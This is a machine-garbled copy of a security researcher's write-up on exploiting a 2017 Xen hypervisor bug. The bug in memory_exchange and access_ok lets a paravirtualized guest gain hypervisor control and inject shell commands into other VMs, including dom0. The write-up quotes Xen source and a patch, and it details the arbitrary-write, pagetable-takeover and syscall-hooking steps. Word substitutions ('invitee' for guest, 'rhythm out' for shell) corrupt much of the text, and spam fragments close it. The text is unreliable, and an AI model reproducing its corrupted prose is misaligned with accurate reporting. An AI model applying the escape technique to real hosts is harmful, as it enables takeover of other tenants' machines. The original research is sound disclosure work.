Pandavirtualization: Exploiting The Xen Hypervisor

Posted yesteryear Jann Horn,

On 2017-03-14, I reported a bug to Xen's safety squad that permits an assailant amongst command over the center of a paravirtualized x86-64 Xen invitee to intermission out of the hypervisor together with gain total command over the machine's physical memory. The Xen Project publicly released an advisory together with a patch for this number 2017-04-04.

To demonstrate the impact of the issue, I created an exploit that, when executed inwards 1 64-bit PV invitee amongst origin privileges, volition execute a rhythm out command equally origin inwards all other 64-bit PV guests (including dom0) on the same physical machine.

Background

access_ok()

On x86-64, Xen PV guests part the virtual address infinite amongst the hypervisor. The coarse retention layout looks equally follows:

Xen allows the invitee center to perform hypercalls, which are essentially normal organization calls from the invitee center to the hypervisor using the System V AMD64 ABI. They are performed using the syscall instruction, amongst upward to vi arguments passed inwards registers. Like normal syscalls, Xen hypercalls ofttimes accept invitee pointers equally arguments. Because the hypervisor shares its address space, it makes feel for guests to only exceed inwards guest-virtual pointers.

Like whatever kernel, Xen has to ensure that guest-virtual pointers don't truly dot to hypervisor-owned retention earlier dereferencing them. It does this using userspace accessors that are similar to those inwards the Linux kernel; for example:

access_ok(addr, size) for checking whether a guest-supplied virtual retention attain is rubber to access - inwards other words, it checks that accessing the retention attain volition non modify hypervisor memory
__copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the invitee address hnd without checking whether hnd is safe
copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the invitee address hnd if hnd is safe

In the Linux kernel, the macro access_ok() checks whether the whole retention attain from addr to addr+size-1 is rubber to access, using whatever retention access pattern. However, Xen's access_ok() doesn't guarantee that much:

* Valid if inwards +ve one-half of 48-bit address space, or to a higher house Xen-reserved area.

* This is besides valid for attain checks (addr, addr+size). As long equally the

* start address is exterior the Xen-reserved expanse so nosotros volition access a

* non-canonical address (and thus fault) earlier ever reaching VIRT_START.

#define __addr_ok(addr) \

(((unsigned long)(addr) < (1UL<<47)) || \

((unsigned long)(addr) >= HYPERVISOR_VIRT_END))

#define access_ok(addr, size) \

(__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))

Xen usually only checks that addr points into the userspace expanse or the center expanse without checking size. If the actual invitee retention access starts roughly at addr, proceeds linearly without skipping gigantic amounts of retention together with bails out equally presently equally a invitee retention access fails, only checking addr is sufficient because of the large attain of non-canonical addresses, which serve equally a large guard area. However, if a hypercall wants to access a invitee buffer starting at a 64-bit offset, it needs to ensure that the access_ok() banking concern check is performed using the right offset - checking the whole userspace buffer is unsafe!

Xen provides wrappers or so access_ok() for accessing arrays inwards invitee memory. If you lot desire to banking concern check whether it's rubber to access an array starting at chemical gene 0, you lot tin exercise guest_handle_okay(hnd, nr). However, if you lot desire to banking concern check whether it's rubber to access an array starting at a unlike element, you lot demand to exercise guest_handle_subrange_okay(hnd, first, last).

When I saw the Definition of access_ok(), the lack of safety guarantees truly provided yesteryear access_ok() seemed rather unintuitive to me, so I started searching for its callers, wondering whether anyone powerfulness live using it inwards an dangerous way.

Hypercall Preemption

When e.g. a scheduler tick happens, Xen needs to live able to chop-chop switch from the currently executing vCPU to some other VM's vCPU. However, only interrupting the execution of a hypercall won't move (e.g. because the hypercall could live asset a spinlock), so Xen (like other operating systems) needs some machinery to delay the vCPU switch until it's rubber to practise so.

In Xen, hypercalls are preempted using voluntary preemption: Any long-running hypercall code is expected to regularly telephone telephone hypercall_preempt_check() to banking concern check whether the scheduler wants to schedule to some other vCPU. If this happens, the hypercall code exits to the guest, thereby signalling to the scheduler that it's rubber to preempt the currently-running task, after adjusting the hypercall arguments (in invitee registers or invitee memory) so that equally presently equally the electrical current vCPU is scheduled again, it volition re-enter the hypercall together with perform the remaining work. Hypercalls don't distinguish betwixt normal hypercall entry together with hypercall re-entry after preemption.

This hypercall re-entry machinery is used inwards Xen because Xen does non receive got 1 hypervisor stack per vCPU; it only has 1 hypervisor stack per physical core. This way that spell other operating systems (e.g. Linux) tin only leave of absence the set down of an interrupted syscall on the center stack, Xen can't practise that equally easily.

This blueprint way that for some hypercalls, to permit them to properly resume their work, additional information is stored inwards invitee retention that could potentially live manipulated yesteryear the invitee to assault the hypervisor.

memory_exchange()

The hypercall HYPERVISOR_memory_op(XENMEM_exchange, arg) invokes the portion memory_exchange(arg) inwards xen/common/memory.c. This portion allows a invitee to "trade in" a listing of physical pages that are currently assigned to the invitee inwards central for novel physical pages amongst unlike restrictions on their physical contiguity. This is useful for guests that desire to perform DMA because DMA requires physically contiguous buffers.

The hypercall takes a struct xen_memory_exchange equally argument, which is defined equally follows:

struct xen_memory_reservation {

/* [...] */

XEN_GUEST_HANDLE(xen_pfn_t) extent_start; /* in: physical page listing */

/* Number of extents, together with size/alignment of each (2^extent_order pages). */

xen_ulong_t nr_extents;

unsigned int extent_order;

/* XENMEMF flags. */

unsigned int mem_flags;

* Domain whose reservation is existence changed.

* Unprivileged domains tin specify only DOMID_SELF.

domid_t domid;

};

struct xen_memory_exchange {

* [IN] Details of retention extents to live exchanged (GMFN bases).

* Note that @in.address_bits is ignored together with unused.

struct xen_memory_reservation in;

* [IN/OUT] Details of novel retention extents.

* We require that:

* 1. @in.domid == @out.domid

* 2. @in.nr_extents << @in.extent_order ==

* @out.nr_extents << @out.extent_order

* 3. @in.extent_start together with @out.extent_start lists must non overlap

* 4. @out.extent_start lists GPFN bases to live populated

* 5. @out.extent_start is overwritten amongst allocated GMFN bases

struct xen_memory_reservation out;

* [OUT] Number of input extents that were successfully exchanged:

* 1. The outset @nr_exchanged input extents were successfully

* deallocated.

* 2. The corresponding outset entries inwards the output extent listing correctly

* indicate the GMFNs that were successfully exchanged.

* 3. All other input together with output extents are untouched.

* 4. If non all input exents are exchanged so the render code of this

* command volition live non-zero.

* 5. THIS FIELD MUST BE INITIALISED TO ZERO BY THE CALLER!

xen_ulong_t nr_exchanged;

};

The fields that are relevant for the põrnikas are in.extent_start, in.nr_extents, out.extent_start, out.nr_extents together with nr_exchanged.

nr_exchanged is documented equally ever existence initialized to nothing yesteryear the invitee - this is because it is non only used to render a upshot value, but besides for hypercall preemption. When memory_exchange() is preempted, it stores its progress inwards nr_exchanged, together with the adjacent execution of memory_exchange() uses the value of nr_exchanged to determine at which dot inwards the input arrays in.extent_start together with out.extent_start it should resume.

Originally, memory_exchange() did non banking concern check the userspace array pointers at all earlier accessing them amongst __copy_from_guest_offset() together with __copy_to_guest_offset(), which practise non perform whatever checks themselves - so yesteryear supplying hypervisor pointers, it was possible to crusade Xen to read from together with write to hypervisor retention - a pretty severe bug. This was discovered inwards 2012 (XSA-29, CVE-2012-5513) together with fixed equally follows (https://xenbits.xen.org/xsa/xsa29-4.1.patch):

diff --git a/xen/common/memory.c b/xen/common/memory.c

index 4e7c234..59379d3 100644

--- a/xen/common/memory.c

+++ b/xen/common/memory.c

@@ -289,6 +289,13 @@ static long memory_exchange(XEN_GUEST_HANDLE(xen_memory_exchange_t) arg)

goto fail_early;

}

+ if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||

+ !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )

+ {

+ rc = -EFAULT;

+ goto fail_early;

+ }

/* Only privileged guests tin allocate multi-page contiguous extents. */

if ( !multipage_allocation_permitted(current->domain,

exch.in.extent_order) ||

The bug

As tin live seen inwards the next code snippet, the 64-bit resumption offset nr_exchanged, which tin live controlled yesteryear the invitee because of Xen's hypercall resumption scheme, tin live used yesteryear the invitee to select an offset from out.extent_start at which the hypervisor should write:

static long memory_exchange(XEN_GUEST_HANDLE_PARAM(xen_memory_exchange_t) arg)

{

[...]

/* Various sanity checks. */

[...]

if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||

!guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )

{

rc = -EFAULT;

goto fail_early;

}

[...]

for ( i = (exch.nr_exchanged >> in_chunk_order);

i < (exch.in.nr_extents >> in_chunk_order);

i++ )

{

[...]

/* Assign each output page to the domain. */

for ( j = 0; (page = page_list_remove_head(&out_chunk_list)); ++j )

{

[...]

if ( !paging_mode_translate(d) )

{

[...]

if ( __copy_to_guest_offset(exch.out.extent_start,

(i << out_chunk_order) + j,

&mfn, 1) )

rc = -EFAULT;

}

[...]

}

[...]

}

However, the guest_handle_okay() banking concern check only checks whether it would live rubber to access the invitee array exch.out.extent_start starting at offset 0; guest_handle_subrange_okay() would receive got been correct. This way that an assailant tin write an 8-byte value to an arbitrary address inwards hypervisor retention yesteryear choosing:

exch.in.extent_order together with exch.out.extent_order equally 0 (exchanging page-sized blocks of physical retention for novel page-sized blocks)

exch.out.extent_start together with exch.nr_exchanged so that exch.out.extent_start points to userspace retention spell exch.out.extent_start+8*exch.nr_exchanged points to the target address inwards hypervisor memory, amongst exch.out.extent_start unopen to NULL; this tin live calculated equally exch.out.extent_start=target_addr%8, exch.nr_exchanged=target_addr/8.
exch.in.nr_extents together with exch.out.nr_extents equally exch.nr_exchanged+1
exch.in.extent_start equally input_buffer-8*exch.nr_exchanged (where input_buffer is a legitimate invitee center pointer to a physical page number that is currently owned yesteryear the guest). This is guaranteed to ever dot to the invitee userspace attain (and thus exceed the access_ok() check) because exch.out.extent_start roughly points to the start of the userspace address attain together with the hypervisor together with invitee center address ranges together are only equally large equally the userspace address range.

The value that is written to the attacker-controlled address is a physical page number (physical address divided yesteryear the page size).

Exploiting the bug: Gaining pagetable control

Especially on a busy system, controlling the page numbers that are written yesteryear the center powerfulness live difficult. Therefore, for reliable exploitation, it makes feel to care for the põrnikas equally a primitive that permits repeatedly writing 8-byte values at controlled addresses, amongst the virtually meaning bits existence zeroes (because of the express amount of physical memory) together with the to the lowest degree meaning bits existence to a greater extent than or less random. For my exploit, I decided to care for this primitive equally 1 that writes an essentially random byte followed yesteryear 7 bytes of garbage.

It turns out that for an x86-64 PV guest, such a primitive is sufficient for reliably exploiting the hypervisor for the next reasons:

x86-64 PV guests know the existent physical page numbers of all pages they tin access
x86-64 PV guests tin map alive pagetables (from all 4 paging levels) belonging to their domain equally readonly; Xen only prevents mapping them equally writable
Xen maps all physical retention equally writable at 0xffff830000000000 (in other words, the hypervisor tin write to whatever physical page, independent of the protections using which it is mapped inwards other places, yesteryear writing to physical_address+0xffff830000000000).

The finish of the assault is to dot an entry inwards a alive degree three pagetable (which I'll telephone telephone "victim pagetable") to a page to which the invitee has write access (which I'll telephone telephone "fake pagetable"). This way that the assailant has to write an 8-byte value, containing the physical page number of the imitation pagetable together with some flags, into an entry inwards the victim pagetable, together with ensure that the next 8-byte pagetable entry stays disabled (e.g. yesteryear setting the outset byte of the next entry to zero). Essentially, the assailant has to write nine controlled bytes followed yesteryear 7 bytes that don't matter.

Because the physical page numbers of all relevant pages together with the address of the writable mapping of all physical retention are known to the guest, figuring out where to write together with what value to write is easy, so the only remaining occupation is how to exercise the primitive to truly write data.

Because the assailant wants to exercise the primitive to write to a readable page, the "write 1 random byte followed yesteryear 7 bytes of garbage" primitive tin easily live converted to a "write 1 controlled byte followed yesteryear 7 bytes of garbage" primitive yesteryear repeatedly writing a random byte together with reading it dorsum until the value is right. Then, the "write 1 controlled byte followed yesteryear 7 bytes of garbage" primitive tin live converted to a "write controlled information followed yesteryear 7 bytes of garbage" primitive yesteryear writing bytes to consecutive addresses - together with that's precisely the primitive needed for the attack.

At this point, the assailant tin command a alive pagetable, which allows the assailant to map arbitrary physical retention into the guest's virtual address space. This way that the assailant tin reliably read from together with write to the memory, both code together with data, of the hypervisor together with all other VMs on the system.

Running rhythm out commands inwards other VMs

At this point, the assailant has total command over the machine, equivalent to the privilege degree of the hypervisor, together with tin easily steal secrets yesteryear searching through physical memory; together with a realistic assailant in all likelihood wouldn't desire to inject code into VMs, considering how much to a greater extent than detectable that makes an attack.

But running an arbitrary rhythm out command inwards other VMs makes the severity to a greater extent than obvious (and it looks cooler), so for fun, I decided to proceed my exploit so that it injects a rhythm out command into all other 64-bit PV domains.

As a outset step, I wanted to reliably gain code execution inwards hypervisor context. Given the powerfulness to read together with write physical memory, 1 relatively OS- (or hypervisor-)independent way to telephone telephone an arbitrary address amongst kernel/hypervisor privileges is to locate the Interrupt Descriptor Table using the unprivileged SIDT instruction, write an IDT entry amongst DPL three together with heighten the interrupt. (Intel's upcoming Cannon Lake CPUs are evidently going to back upward User-Mode Instruction Prevention (UMIP), which volition finally brand SIDT a privileged instruction.) Xen supports SMEP together with SMAP, so it isn't possible to just dot the IDT entry at invitee memory, but using the powerfulness to write pagetable entries, it is possible to map a guest-owned page amongst hypervisor-context shellcode equally non-user-accessible, which allows it to run despite SMEP.

Then, inwards hypervisor context, it is possible to claw the syscall entry dot yesteryear reading together with writing the IA32_LSTAR MSR. The syscall entry dot is used both for syscalls from invitee userspace together with for hypercalls from invitee kernels. By mapping an attacker-controlled page into guest-user-accessible memory, changing the register set down together with invoking sysret, it is possible to divert the execution of invitee userspace code to arbitrary invitee user shellcode, independent of the hypervisor or the invitee operating system.

My exploit injects shellcode into all invitee userspace processes that is invoked on every write() syscall. Whenever the shellcode runs, it checks whether it is running amongst origin privileges together with whether a lockfile doesn't be inwards the guest's filesystem yet. If these weather condition are fulfilled, it uses the clone() syscall to create a youngster procedure that runs an arbitrary rhythm out command.

(Note: My exploit doesn't build clean upward after itself on purpose, so when the attacking domain is unopen downward later, the hooked entry dot volition chop-chop crusade the hypervisor to crash.)

Here is a screenshot of a successful assault against Qubes OS 3.2, which uses Xen equally its hypervisor. The exploit is executed inwards the unprivileged domain "test124"; the screenshot shows that it injects code into dom0 together with the firewallvm:

Conclusion

I believe that the origin crusade of this number were the weak safety guarantees made yesteryear access_ok(). The electrical current version of access_ok() was committed inwards 2005, ii years after the outset world free of Xen together with long earlier the outset XSA was released. It seems similar former code tends to comprise relatively straightforward weaknesses to a greater extent than ofttimes than newer code because it was committed amongst less scrutiny regarding safety issues, together with such former code is so ofttimes left alone.

When security-relevant code is optimized based on assumptions, tending must live taken to reliably forbid those assumptions from existence violated. access_ok() truly used to banking concern check whether the whole attain overlaps hypervisor memory, which would receive got prevented this põrnikas from occurring. Unfortunately, inwards 2005, a commit amongst "x86_64 fixes/cleanups" was made that changed the behaviour of access_ok() on x86_64 to the electrical current one. As far equally I tin tell, the only argue this didn't straight off brand the MEMOP_increase_reservation together with MEMOP_decrease_reservation hypercalls vulnerable is that the nr_extents declaration of do_dom_mem_op() was only 32 bits broad - a relatively brittle defense.

While at that topographic point receive got been several Xen vulnerabilities that only affected PV guests because the issues were inwards code that is unnecessary when dealing amongst HVM guests, I believe that this isn't 1 of them. Accessing invitee virtual retention is much to a greater extent than straightforward for PV guests than for HVM guests: For PV guests, raw_copy_from_guest() calls copy_from_user(), which basically just does a bounds banking concern check followed yesteryear a memcpy amongst pagefault fixup - the same thing normal operating organization kernels practise when accessing userspace memory. For HVM guests, raw_copy_from_guest() calls copy_from_user_hvm(), which has to practise a page-wise re-create (because the retention expanse powerfulness live physically non-contiguous together with the hypervisor doesn't receive got a contiguous virtual mapping of it) amongst invitee pagetable walks (to interpret invitee virtual addresses to invitee physical addresses) together with invitee frame lookups for every page, including reference counting, mapping invitee pages into hypervisor retention together with diverse checks to e.g. forbid HVM guests from writing to readonly grant mappings. So for HVM, the complexity of treatment invitee retention accesses is truly higher than for PV.

For safety researchers, I recollect that a lesson from this is that paravirtualization is non much harder to empathise than normal kernels. If you've audited center code before, the hypercall entry path (lstar_enter together with int80_direct_trap inwards xen/arch/x86/x86_64/entry.S) together with the basic blueprint of hypercall handlers (for x86 PV: listed inwards the pv_hypercall_table inwards xen/arch/x86/pv/hypercall.c) should facial expression to a greater extent than or less similar normal syscalls.

plantillasnowcrystalsdelui

Cari Blog Ini